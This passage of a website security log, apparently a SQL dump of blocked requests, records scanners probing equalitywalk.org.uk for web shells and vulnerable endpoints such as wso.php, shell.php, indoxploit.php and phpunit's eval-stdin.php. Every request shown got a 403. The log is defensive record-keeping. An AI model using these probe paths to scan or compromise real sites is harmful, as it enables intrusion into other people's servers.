(KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','Bvq4GN5EhZ6RH9gCWLOyj3Ul',0,1673819179.3880,119,'','GET',403,0,700,0,1,'',0),('5.161.41.233',94448105,'','https://www.equalitywalk.org.uk/blog/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','zRPVndbg7ywaeO816hJojUFq',0,1673819183.6407,157,'','GET',403,0,700,0,1,'',0),('5.161.41.233',94448105,'','https://www.equalitywalk.org.uk/site/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','1MX8TnkWJbZxgtlh6AYoyNEv',0,1673819187.8766,171,'','GET',403,0,700,0,1,'',0),('5.161.41.233',94448105,'','https://www.equalitywalk.org.uk/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','83RKdACS1DNsWFYUxrIkPq9i',0,1673821468.1224,96,'','GET',403,0,700,0,1,'',0),('5.161.41.233',94448105,'','https://www.equalitywalk.org.uk/wp/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','ndEY4DpNLsTqxgW95fGPcbUj',0,1673821474.1428,138,'','GET',403,0,700,0,1,'',0),('5.161.41.233',94448105,'','https://www.equalitywalk.org.uk/wordpress/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','PAF5BTjJMfCwXUEuLcQIle6K',0,1673821481.5810,122,'','GET',403,0,700,0,1,'',0),('5.161.41.233',94448105,'','https://www.equalitywalk.org.uk/blog/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','PFuUoYxyrnQL6WCd2HTzKAs1',0,1673821488.9156,105,'','GET',403,0,700,0,1,'',0),('5.161.41.233',94448105,'','https://www.equalitywalk.org.uk/site/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','jLn1IU0kJxSTa47euPMKHNfO',0,1673821496.0833,112,'','GET',403,0,700,0,1,'',0),('87.236.20.122',1475089530,'','https://equalitywalk.org.uk/style.php?sig=rename','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 8.0.0; PRA-TL10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.116 Mobile Safari\\/537.36\"}','WhAGd69tVOQiZ8JspLUxocnH',0,1673822491.3452,125,'','GET',403,0,700,0,1,'',0),('87.236.20.122',1475089530,'','https://equalitywalk.org.uk/wp-admin/style.php?sig=rename','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','0wFiJQuRndcTLONrBX6xs35z',0,1673822491.3636,127,'','GET',403,0,700,0,1,'',0),('194.38.20.161',3257275553,'','https://equalitywalk.org.uk/sites/all/modules/civicrm.local/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','','{\"1\":\"ALittle Client\"}','dPhrHnFC59b02y7iUefIcvJS',0,1673827276.9664,1275,'','GET',403,0,700,0,1,'',0),('193.142.146.138',3247346314,'','https://www.equalitywalk.org.uk/abruzi.php4','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','Z92xgF1wljVKJvBhX6bcnM4C',0,1673834550.8958,101,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"python-requests\\/2.27.1\"}','GHJ6ShRZa8vBuT4Fwsqn1diN',0,1673835788.7925,266,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/wp-includes/css/modules.php','','{\"1\":\"python-requests\\/2.27.1\"}','NIytX9qjw6WQTbuHnogY0Sxa',0,1673837134.8372,139,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/wso.php','','{\"1\":\"python-requests\\/2.27.1\"}','ALVCyJPGOo21xNqDrfHlvYRn',0,1673837135.3475,150,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/wp-admin/shapes.php','','{\"1\":\"python-requests\\/2.27.1\"}','OrEbBcZRfPe745nG8wzgoCdJ',0,1673837140.8980,142,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/olux.php','','{\"1\":\"python-requests\\/2.27.1\"}','NSEkLzcAX0FqyQ8nUupbMlDC',0,1673837141.7746,123,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.27.1\"}','UglGdqhLkKyj1VDWTofwIEa3',0,1673837142.8049,146,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/up.php','','{\"1\":\"python-requests\\/2.27.1\"}','gf09rGDxlKWjybhs8J1vRauo',0,1673837146.5217,124,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/upload.php','','{\"1\":\"python-requests\\/2.27.1\"}','DzRLHIrj2gtb3in7ykNpPowZ',0,1673837147.1925,595,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/shell.php','','{\"1\":\"python-requests\\/2.27.1\"}','KBxvn8ZXcwNu3jghUHGaJE6R',0,1673837150.1514,99,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/wp-admin/network/wp-footer.php','','{\"1\":\"python-requests\\/2.27.1\"}','QA3zENCr8FiByxb6GY5Pe4t7',0,1673837151.7323,116,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/wp-info.php','','{\"1\":\"python-requests\\/2.27.1\"}','U4zmYps1a7RkX0b9SqjDFHfQ',0,1673837152.5761,135,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/upel.php','','{\"1\":\"python-requests\\/2.27.1\"}','XZwoN5jLEqlhYeG2JgHROBCK',0,1673837153.5011,87,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/098.php','','{\"1\":\"python-requests\\/2.27.1\"}','PWNflbHpECe9yr627QuI1Ldk',0,1673837160.6002,117,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/V5.php','','{\"1\":\"python-requests\\/2.27.1\"}','D8qbVZ9vw3aPKmpOjNLMSzEu',0,1673837161.0822,100,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/new_license.php','','{\"1\":\"python-requests\\/2.27.1\"}','okdxyjIbpNRtiJVG78H4q63n',0,1673837161.5037,169,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/wso.php','','{\"1\":\"python-requests\\/2.27.1\"}','zxpZG6UherliP2mqkI4soy5v',0,1673837163.8498,106,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/modules/modules/modules.php','','{\"1\":\"python-requests\\/2.27.1\"}','DR2PUywH4GuS1g7BhoN8O5FW',0,1673837167.3746,133,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/modules/mod_simplefileuploadv1.3/elements/Clean.php','','{\"1\":\"python-requests\\/2.27.1\"}','LjFklScrdE4PyBKOWNJC6zUG',0,1673837168.0925,106,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/modules/mod_simplefileuploadv1.3/elements/udd.php','','{\"1\":\"python-requests\\/2.27.1\"}','n4hZipcTaB1US79ybY0dM5jl',0,1673837169.9681,110,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/libraries/joomla/css.php','','{\"1\":\"python-requests\\/2.27.1\"}','e60MB2WwgQn7UXtRLZmdcJ3s',0,1673837171.9846,105,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/libraries/joomla/jmails.php?u','','{\"1\":\"python-requests\\/2.27.1\"}','dZ3OFlbWUmK1EPHoQcq7TSef',0,1673837173.2334,105,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/libraries/joomla/jmail.php?u','','{\"1\":\"python-requests\\/2.27.1\"}','txqBKNG6gJcVbMTdsZSOYhL5',0,1673837175.2244,97,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/images/vuln.php','','{\"1\":\"python-requests\\/2.27.1\"}','OT6mRfboLaqYINFiXrv5C0c2',0,1673837175.7880,138,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/tmp/vuln.php','','{\"1\":\"python-requests\\/2.27.1\"}','Ugwn4v1RxQjPeA9MOZqCSF5y',0,1673837176.4716,104,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/XxX.php','','{\"1\":\"python-requests\\/2.27.1\"}','8cQI7pWHLrwq2xj6AtaufeNd',0,1673837177.0145,124,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/Marvins.php','','{\"1\":\"python-requests\\/2.27.1\"}','RnKDmJB5yGoULVEd2uHq6ijQ',0,1673837185.8261,118,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/rxr.php?rxr','','{\"1\":\"python-requests\\/2.27.1\"}','xkK8vWs9RIaB1TyVD3Ewz64u',0,1673837202.2563,169,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/olux.php','','{\"1\":\"python-requests\\/2.27.1\"}','qQXUJv2CaB1O3KTG7rFzMHpy',0,1673837203.5850,109,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.27.1\"}','NxPYruqm4J36hCISVl7eOb1B',0,1673837205.3409,109,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','nmarVSXA51shFYptjOflZ3xK',0,1673837212.8693,162,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/RxR.php','','{\"1\":\"python-requests\\/2.27.1\"}','0iJoume2O3AX5yV6rp1gURtv',0,1673837213.4723,145,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/components/com_b2jcontact/izoc.php','','{\"1\":\"python-requests\\/2.27.1\"}','QMelkP5wd4HcvfOJ807EDZXG',0,1673837216.9841,166,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/V3.php','','{\"1\":\"python-requests\\/2.27.1\"}','inGY50bKaFkwfqdBcROC2DZS',0,1673837218.5643,183,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/V5.php','','{\"1\":\"python-requests\\/2.27.1\"}','qdwJe4jl75aY3zUhDRQWfiEo',0,1673837221.2382,153,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/up.php','','{\"1\":\"python-requests\\/2.27.1\"}','PX2kiCzWrOvAZ379DgaKhspS',0,1673837225.3549,135,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/upload.php','','{\"1\":\"python-requests\\/2.27.1\"}','tTRaWbJ3081nLUomq2EewfAh',0,1673837226.8935,170,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/shell.php','','{\"1\":\"python-requests\\/2.27.1\"}','nivQVEokDj4LHJtRCeM9aqys',0,1673837227.5022,156,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/administrator/templates/bluestork/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','eWU7fhdsjcb6gyBIDqLGmr4K',0,1673837228.1371,107,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/administrator/templates/bluestork/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','8m6I7qlADgcEWB5OJx0XKZyL',0,1673837231.7290,104,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/administrator/templates/hathor/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','O8WVyLPTRzMfUsIwGql61XZH',0,1673837232.6009,148,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/administrator/templates/hathor/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','L3EMJ1obfWmvkCjZDrg74HTq',0,1673837236.2773,106,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/administrator/templates/isis/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','6ax23uAmzPHeLqWb89fypDUO',0,1673837236.9759,102,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/administrator/templates/isis/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','2q6GPvdxkziw4HMaWTnKJRY5',0,1673837237.7913,98,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/templates/beez/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','LbGwfinx0p5gvValyoFQRArH',0,1673837238.6970,104,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/templates/ja_purity/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','3jmbAoSqORXJDHKZ9Mr7zfyl',0,1673837239.5235,125,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/templates/rhuk_milkyway/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','jtepBIYK1J9lzUXGriZRaoPH',0,1673837240.4871,145,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/templates/system/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','lERgsxwm2udjiK3pqaZ0eYUV',0,1673837242.4664,120,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/templates/system/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','C7SMjkwPAYf1FBdODHmaqinr',0,1673837244.9523,171,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/olux.php','','{\"1\":\"python-requests\\/2.27.1\"}','8U6AEGHbnmh4tlf1zRoNZcVC',0,1673837261.2343,105,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.27.1\"}','FjYfspV1NPK9maCQeEUR0Bnw',0,1673837268.7745,122,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.27.1\"}','QUpou9BdsZRFv68LlaKT4OIP',0,1673837271.8466,167,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/wso.php','','{\"1\":\"python-requests\\/2.27.1\"}','d9PfetIBu3JQ7v4DmhiLVlK0',0,1673837273.2608,155,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/up.php','','{\"1\":\"python-requests\\/2.27.1\"}','fNG4z6FCml2UoO5nL0Bx3AwS',0,1673837292.2338,193,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/upload.php','','{\"1\":\"python-requests\\/2.27.1\"}','hcUkBrVNMYC3DWKxL6O7tg2J',0,1673837292.7742,126,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/shell.php','','{\"1\":\"python-requests\\/2.27.1\"}','fcYjCVtmqlSM7XLF1k0h9QWp',0,1673837293.4566,108,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/wp-includes/css/modules.php','','{\"1\":\"python-requests\\/2.27.1\"}','BTscWLFbHGzE0il1qgZAPMen',0,1673840119.7942,372,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/wso.php','','{\"1\":\"python-requests\\/2.27.1\"}','ynMfjAwoKB4gOaizTsIvbC0E',0,1673840121.3133,237,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/wp-admin/shapes.php','','{\"1\":\"python-requests\\/2.27.1\"}','GlJKIjtYEmbq6zAUMDn8uiV9',0,1673840131.7572,404,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/olux.php','','{\"1\":\"python-requests\\/2.27.1\"}','SeMZqGVAKd9gwos0vhJPk5QR',0,1673840133.7635,389,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.27.1\"}','Ugxy4CfjVNzE9iZQAHh7Jtwv',0,1673840135.8566,481,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/up.php','','{\"1\":\"python-requests\\/2.27.1\"}','mIz0XQqvCtJYrAH4LBRUgMhS',0,1673840139.1814,364,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/upload.php','','{\"1\":\"python-requests\\/2.27.1\"}','Jhn13Vis8WEbNFekgpBj6XDZ',0,1673840140.8088,512,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/shell.php','','{\"1\":\"python-requests\\/2.27.1\"}','Qq30R8TnSwOPH5LvefBi6CNg',0,1673840144.9813,260,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/wp-admin/network/wp-footer.php','','{\"1\":\"python-requests\\/2.27.1\"}','5XtAS9i3qFCx2jlmGnucVE4r',0,1673840146.1615,260,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/wp-info.php','','{\"1\":\"python-requests\\/2.27.1\"}','HvzwdqnYpkWTAGXR6m8NeUrK',0,1673840147.5900,438,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/upel.php','','{\"1\":\"python-requests\\/2.27.1\"}','7wjqhMCDTYOSzNHxUmcWQ9o2',0,1673840151.4837,259,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/098.php','','{\"1\":\"python-requests\\/2.27.1\"}','aKAZ9ghJTI5iX4EoxYzPmwVB',0,1673840154.1081,351,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/V5.php','','{\"1\":\"python-requests\\/2.27.1\"}','QGhut8VgnXY51SfswUvEKzBL',0,1673840155.6125,216,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/new_license.php','','{\"1\":\"python-requests\\/2.27.1\"}','fC30qisSGZxNr9ldahPwuRp8',0,1673840156.8312,444,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/shell4.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','vAbS9oZkFczBVJKIC5yPjN2s',0,1673843011.3141,126,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.equalitywalk.org.uk/ups.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','yPBhV7KCkMZrJnUe2Eg9FR5p',0,1673843012.1625,124,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/1index.php','','{\"1\":\"python-requests\\/2.28.1\"}','15aQTSyR4EfzVcrj8AJFu9NC',0,1673843242.5519,149,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/2index.php','','{\"1\":\"python-requests\\/2.28.1\"}','dSxYD69O1bc7pPTi4XNfG3Hl',0,1673843255.3359,112,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/3index.php','','{\"1\":\"python-requests\\/2.28.1\"}','J8tubawrDNTFC16OcjKsZEiL',0,1673843278.2307,113,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/wp-admin.php','','{\"1\":\"python-requests\\/2.28.1\"}','szpVZcRhbvOSEXJfyIgGnta6',0,1673843286.1188,95,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/content.php','','{\"1\":\"python-requests\\/2.28.1\"}','pAjQJZ5mXtE9vLHPnYy43IWl',0,1673843298.2688,108,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/old-index.php','','{\"1\":\"python-requests\\/2.28.1\"}','S5mFAvWBp7TsbORl4c6NeG1M',0,1673843312.6020,125,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/new-index.php','','{\"1\":\"python-requests\\/2.28.1\"}','E9jlCvNepU2fxWXFiAqzBZaP',0,1673843321.4802,139,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/admin.php','','{\"1\":\"python-requests\\/2.28.1\"}','P7U2HdnLq6MobpQjR9w0mi1l',0,1673843329.8205,117,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/wp-includes/css/xm.php','','{\"1\":\"python-requests\\/2.28.1\"}','oOX4P6CAjRr87aBVKbMdLTnU',0,1673843340.2924,116,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/wikindex.php','','{\"1\":\"python-requests\\/2.28.1\"}','QAi56NexIrP7k1wn2Y38bmGJ',0,1673843349.2641,154,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/ups.php','','{\"1\":\"python-requests\\/2.28.1\"}','NQF6pw3JXsEdfCSoa8LWOti2',0,1673843383.5182,170,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/media-admin.php','','{\"1\":\"python-requests\\/2.28.1\"}','CpH9LVUASMy7wE1tnW5TIviP',0,1673843392.4513,117,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/mt/pekok.php','','{\"1\":\"python-requests\\/2.28.1\"}','r0y9tZdTfaPMSVg2uoJBWCbe',0,1673843401.3811,144,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/wp_wrong_datlib.php','','{\"1\":\"python-requests\\/2.28.1\"}','kNF0XtmfQH4crEAWKpLT3MUb',0,1673843412.5774,206,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/fw.php','','{\"1\":\"python-requests\\/2.28.1\"}','NGLmT6rkE1etWhIg90MD25zj',0,1673843430.1733,114,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/.cgi/cache/index.php','','{\"1\":\"python-requests\\/2.28.1\"}','cQmD71OvLzE4a6UPNTyJ02MK',0,1673843450.9917,127,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/fox.php','','{\"1\":\"python-requests\\/2.28.1\"}','hrbW2skvcGPVd4igTLQ9AeDM',0,1673843462.6315,110,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/fox.php','','{\"1\":\"python-requests\\/2.28.1\"}','6JkgG7OxB3qb591CoV0KNdEY',0,1673843470.2894,105,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/xleet.php','','{\"1\":\"python-requests\\/2.28.1\"}','c3lGOMFY8CvjLn6rHNUoP1Bg',0,1673843484.4657,106,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/radio.php','','{\"1\":\"python-requests\\/2.28.1\"}','c70KSstp2jhrPOgoCaA81LEX',0,1673843494.0913,174,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/wp-includes/css/css.php','','{\"1\":\"python-requests\\/2.28.1\"}','ob7sYvhz8T2qilErpKwCk6Q3',0,1673843530.0810,1195,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/wp-includes/css/wp-atom.php','','{\"1\":\"python-requests\\/2.28.1\"}','lRYzNcFvn3uqahwJ2tGTCr58',0,1673843582.5624,1164,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/export.php','','{\"1\":\"python-requests\\/2.28.1\"}','JpINjmUxwK5tWPT2Z8i6079u',0,1673843626.5247,776,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/wp-includes/images/wp-blog.php','','{\"1\":\"python-requests\\/2.28.1\"}','rX3pyaQGZb4l5mMxEK2cRtH6',0,1673843638.8985,1131,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/wp-includes/css/wp.php','','{\"1\":\"python-requests\\/2.28.1\"}','w2B06sG7gHXe4h8C3dmijDN9',0,1673843660.5546,1185,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/mini.php','','{\"1\":\"python-requests\\/2.28.1\"}','PHn78axsyzOwXNoVGb6jIcBk',0,1673843678.6383,946,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/wso.php','','{\"1\":\"python-requests\\/2.28.1\"}','b4hofdAE7nlOVtkJ3GQIXpY2',0,1673843700.3685,1383,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/alwso.php','','{\"1\":\"python-requests\\/2.28.1\"}','oqK9fFv5ViYWNtSk4AyRXjZG',0,1673843731.3371,852,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/shx.php','','{\"1\":\"python-requests\\/2.28.1\"}','Rh0kKsTrUiC6l7FIeMvHExyO',0,1673843747.9327,1370,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/wp-admin/includes/class-wp-media-list-data.php','','{\"1\":\"python-requests\\/2.28.1\"}','rBUS7Yb8Nlmc2PwdJGuDMLWq',0,1673843880.5566,1170,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalit